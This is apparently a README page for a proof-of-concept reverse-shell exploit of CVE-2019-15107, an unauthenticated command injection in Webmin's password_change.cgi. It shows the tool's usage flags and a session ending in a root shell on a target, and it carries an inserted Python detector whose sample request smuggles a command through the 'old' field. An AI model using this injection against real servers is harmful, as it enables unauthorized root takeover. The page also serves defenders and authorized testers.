## https://sploitus.com/exploit?id=D2CA83CD-C0A3-592F-ADAE-CDAE8552BDE4
# CVE-2019-15107 - Webmin Unauthenticated RCE

## Description

This repository contains a proof-of-concept (PoC) exploit for CVE-2019-15107 affecting Webmin ≤ 1.920.

The vulnerability exists in the `password_change.cgi` endpoint, where the `old` parameter is vulnerable to command injection, allowing an unauthenticated attacker to achieve remote code execution (RCE).
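For defenders watching a reverse proxy or WAF in front of Webmin, the practical detection point is exactly the request shape described above: a request to `password_change.cgi` whose `old` field carries shell metacharacters that no real password-change would contain. The following is an added example (not part of this repository or of Webmin) of that check run over constructed request records; the field names other than `old` (`user`, `pam`, `expired`, `new1`, `new2`) are assumed for the sample bodies and are not taken from this page.

```python
import re
from urllib.parse import parse_qs, urlparse

# Shell metacharacters that have no business inside a password field.
# (Assumption: the detector sees the decoded request, e.g. at a proxy/WAF
# that can inspect POST bodies; a plain access log does not show them.)
META_RE = re.compile(r"[|;&`$(){}<>\n]")


def is_suspicious_request(method: str, target: str, body: str) -> bool:
    """Return True for a request to password_change.cgi whose `old`
    parameter contains shell metacharacters, in either the POST body
    or (for GET) the query string."""
    path = urlparse(target).path
    if not path.endswith("/password_change.cgi"):
        return False
    raw = body if method.upper() == "POST" else urlparse(target).query
    # parse_qs percent-decodes, so %7C becomes | before matching.
    params = parse_qs(raw, keep_blank_values=True)
    return any(META_RE.search(value) for value in params.get("old", []))


# Constructed sample traffic as (method, target, body); not captured data.
SAMPLE_REQUESTS = [
    ("POST", "/password_change.cgi",
     "user=root&pam=&expired=2&old=a%7Cid&new1=x&new2=x"),      # metacharacter in old
    ("POST", "/password_change.cgi",
     "user=alice&pam=&expired=2&old=Winter2019&new1=y&new2=y"), # ordinary change
    ("GET", "/session_login.cgi", ""),                          # unrelated endpoint
]


def scan(requests):
    """Return the indexes of requests that should be alerted on."""
    return [i for i, (m, t, b) in enumerate(requests)
            if is_suspicious_request(m, t, b)]


if __name__ == "__main__":
    for idx in scan(SAMPLE_REQUESTS):
        method, target, body = SAMPLE_REQUESTS[idx]
        print(f"[!] suspicious {method} {target} body={body!r}")
```

Matching on metacharacters rather than on a specific payload keeps the rule useful against encoding variations (`%7C`, `%60`, `%24%28`), since `parse_qs` decodes before the regex runs; the cost is that a legitimately chosen password containing such a character would also be flagged, which for this endpoint is an acceptable false-positive rate.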

## Tested Environment

The exploit was successfully tested against:

- Webmin version: 1.890
- Operating system: Ubuntu 18.04.4 LTS

## Usage

```bash
python3 cve-2019-15107.py -r RHOST -l LHOST [options]

options:
  -h, --help                 Show this help message and exit
  -r, --rhost RHOST          Target IP
  -rp, --rport RPORT         Target port (default: 10000)
  -l, --lhost LHOST          Local IP address for reverse shell callback
  -lp, --lport LPORT         Local port for reverse shell (default: 4343)
  -s, --scheme {http,https}  Protocol to use (default: https)
  -x, --proxy [PROXY]        Route traffic through proxy (default: http://127.0.0.1:8080)
  -n, --no-check             Skip vulnerability check and run exploit directly
```

## Example

```bash
┌──(adam㉿kali)-[~]
└─$ python3 cve-2019-15107.py -r 10.114.157.14 -l 192.168.158.129

   _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
  / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
 | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
  \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  

  CVE-2019-15107 | Webmin Unauthenticated RCE
  by adampawelczyk

[*] Checking vulnerability...
[+] Target is vulnerable
[*] Starting listener on port 4343...
listening on [any] 4343 ...
[*] Sending payload...
connect to [192.168.158.129] from (UNKNOWN) [10.114.157.14] 53542
bash: cannot set terminal process group (1324): Inappropriate ioctl for device
bash: no job control in this shell
root@source:/usr/share/webmin/# whoami
whoami
root
root@source:/usr/share/webmin/# 
```

## References

- [CVE-2019-15107](https://nvd.nist.gov/vuln/detail/CVE-2019-15107)

## Disclaimer

This tool is for educational and authorized testing purposes only. Unauthorized use against systems you do not own or have permission to test is illegal. Use responsibly.